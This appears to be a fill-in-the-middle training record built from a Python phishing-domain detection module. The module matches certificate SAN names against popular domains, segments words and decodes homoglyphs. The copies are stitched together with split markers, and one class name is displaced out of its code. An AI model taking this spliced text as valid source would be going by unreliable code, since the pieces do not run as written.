# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segment to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off cause it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class DomainMatchingOption(Enum):
'''
Control how strict we want to do our matching.
'''
# For example applefake.it will match with apple.com case ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN name, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Use internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advance analysers to have their says in that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = True if len(record['all_domains']) >= self.threshold else False
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard cause it interfere with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Fail to decode the domain, just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be right done after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using the confusable-homoglyphs, we are going to generate all alternatives ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we will only care about latin character
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decice to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is latin, we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the lengh of the homoglyph here cause
# confusable_homoglyphs library nicely returns multi-character
# match as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
'''
if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
class FeaturesGenerator(Analyser):
| '''
Generate features to detect outliers in the stream. In our case, the outliers is
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = []
Y_samples = []
for analyser in record['analysers']:
if analyser['analyser'] != 'WordSegmentation':
continue
for domain, segments in analyser['output'].items():
# Remove wildcard domain
domain = re.sub(r'^\*\.', '', domain)
parts = domain.split('.')
x = []
# Compute the number of domain parts
x.append(len(parts))
# Compute the length of the whole domain
x.append(len(domain))
longest = ''
# Compute the length of the longest domain parts
for part in parts:
if len(part) > len(longest):
longest = part
x.append(len(longest))
# Compute the length of the TLD
x.append(len(parts[-1]))
randomness_count = 0
# The nostril package which we are using to detect non-sense words
# in the domain only returns a boolean verdict so may be we need to
# think of how we want to quantify this
for w in segments:
try:
if len(w) >= FeaturesGenerator.NOSTRIL_LENGTH_LIMIT and nonsense(w):
randomness_count += 1
except ValueError:
continue
x.append(randomness_count / len(segments))
x_samples.append(x)
Y_samples.append(True if 'usual_suspect' in record else False)
break
record['analysers'].append({
'analyser': type(self).__name__,
'output': x_samples,
})
return record | identifier_body |
|
common_domain_analyser.py | '''
Verify the domain against the list of most popular domains from OpenDNS
(https://github.com/opendns/public-domain-lists). Let's see how useful
it is to prevent phishing domains.
'''
from enum import Enum
import re
import tldextract
import wordsegment
from nostril import nonsense
import idna
from confusable_homoglyphs import confusables
import ahocorasick
from .base import Analyser
# Take a histogram here and find out the suitable value for this
BULK_DOMAIN_THRESHOLD = 15
# pylint: disable=too-few-public-methods
class AhoCorasickDomainMatching(Analyser):
'''
The domain and its SAN will be compared against the list of domains, for
example, the most popular domains from OpenDNS.
'''
# Get this number from the histogram of the length of all top domains
MIN_MATCHING_LENGTH = 3
# Some domains that don't work too well with tldextract and generate too
# many FPs
EXCLUDED_DOMAINS = {
'www': 1,
'web': 1,
}
# Some common domain parts that cause too many FP
IGNORED_PARTS = r'^(autodiscover\.|cpanel\.)'
def __init__(self, domains):
'''
Use Aho-Corasick to find the matching domain so we construct its Trie
here. Thought: How the f**k is com.com in the list?
'''
self.automaton = ahocorasick.Automaton()
self.domains = {}
for index, domain in enumerate(domains):
# Processing only the domain part. All sub-domains or TLDs will
# be ignored, for example:
# - www.google.com becomes google
# - www.google.co.uk becomes google
# - del.icio.us becomes icio
ext = tldextract.extract(domain)
if ext.domain in AhoCorasickDomainMatching.EXCLUDED_DOMAINS:
continue
self.automaton.add_word(ext.domain, (index, ext.domain))
self.domains[ext.domain] = domain
self.automaton.make_automaton()
def run(self, record):
'''
Use Aho-Corasick to find the matching domain. Check the time complexity
of this function later.
Tricky situation #1: When the string (domain) in the Trie is too short,
it could match many domains, for example, g.co or t.co. So they need
to be ignored somehow. Looking at the histogram of the length of all
domains in the list, there are only less than 100 domains with the
length of 2 or less. So we choose to ignore those. Also, we will
prefer longer match than a shorter one for now.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segment to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off cause it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class | (Enum):
'''
Control how strict we want to do our matching.
'''
# For example applefake.it will match with apple.com case ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN name, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Use internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advance analysers to have their says in that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = True if len(record['all_domains']) >= self.threshold else False
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard cause it interfere with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Fail to decode the domain, just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be right done after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using the confusable-homoglyphs, we are going to generate all alternatives ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we will only care about latin character
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decice to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is latin, we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the lengh of the homoglyph here cause
# confusable_homoglyphs library nicely returns multi-character
# match as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
'''
if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
class FeaturesGenerator(Analyser):
'''
Generate features to detect outliers in the stream. In our case, the outliers is
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = []
Y_samples = []
for analyser in record['analysers']:
if analyser['analyser'] != 'WordSegmentation':
continue
for domain, segments in analyser['output'].items():
# Remove wildcard domain
domain = re.sub(r'^\*\.', '', domain)
parts = domain.split('.')
x = []
# Compute the number of domain parts
x.append(len(parts))
# Compute the length of the whole domain
x.append(len(domain))
longest = ''
# Compute the length of the longest domain parts
for part in parts:
if len(part) > len(longest):
longest = part
x.append(len(longest))
# Compute the length of the TLD
x.append(len(parts[-1]))
randomness_count = 0
# The nostril package which we are using to detect non-sense words
# in the domain only returns a boolean verdict so may be we need to
# think of how we want to quantify this
for w in segments:
try:
if len(w) >= FeaturesGenerator.NOSTRIL_LENGTH_LIMIT and nonsense(w):
randomness_count += 1
except ValueError:
continue
x.append(randomness_count / len(segments))
x_samples.append(x)
Y_samples.append(True if 'usual_suspect' in record else False)
break
record['analysers'].append({
'analyser': type(self).__name__,
'output': x_samples,
})
return record
| DomainMatchingOption | identifier_name |
common_domain_analyser.py | '''
Verify the domain against the list of most popular domains from OpenDNS
(https://github.com/opendns/public-domain-lists). Let's see how useful
it is to prevent phishing domains.
'''
from enum import Enum
import re
import tldextract
import wordsegment
from nostril import nonsense
import idna
from confusable_homoglyphs import confusables
import ahocorasick
from .base import Analyser
# Take a histogram here and find out the suitable value for this
BULK_DOMAIN_THRESHOLD = 15
# pylint: disable=too-few-public-methods
class AhoCorasickDomainMatching(Analyser):
'''
The domain and its SAN will be compared against the list of domains, for
example, the most popular domains from OpenDNS.
'''
# Get this number from the histogram of the length of all top domains
MIN_MATCHING_LENGTH = 3
# Some domains that don't work too well with tldextract and generate too
# many FPs
EXCLUDED_DOMAINS = {
'www': 1,
'web': 1,
}
# Some common domain parts that cause too many FP
IGNORED_PARTS = r'^(autodiscover\.|cpanel\.)'
def __init__(self, domains):
'''
Use Aho-Corasick to find the matching domain so we construct its Trie
here. Thought: How the f**k is com.com in the list?
'''
self.automaton = ahocorasick.Automaton()
self.domains = {}
for index, domain in enumerate(domains):
# Processing only the domain part. All sub-domains or TLDs will
# be ignored, for example:
# - www.google.com becomes google
# - www.google.co.uk becomes google
# - del.icio.us becomes icio
ext = tldextract.extract(domain)
if ext.domain in AhoCorasickDomainMatching.EXCLUDED_DOMAINS:
continue
self.automaton.add_word(ext.domain, (index, ext.domain))
self.domains[ext.domain] = domain
self.automaton.make_automaton()
def run(self, record):
'''
Use Aho-Corasick to find the matching domain. Check the time complexity
of this function later.
Tricky situation #1: When the string (domain) in the Trie is too short,
it could match many domains, for example, g.co or t.co. So they need
to be ignored somehow. Looking at the histogram of the length of all
domains in the list, there are only less than 100 domains with the
length of 2 or less. So we choose to ignore those. Also, we will
prefer longer match than a shorter one for now.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segment to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off cause it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class DomainMatchingOption(Enum):
'''
Control how strict we want to do our matching.
'''
# For example applefake.it will match with apple.com case ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN name, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Use internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advance analysers to have their says in that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = True if len(record['all_domains']) >= self.threshold else False
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard cause it interfere with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Fail to decode the domain, just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be right done after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
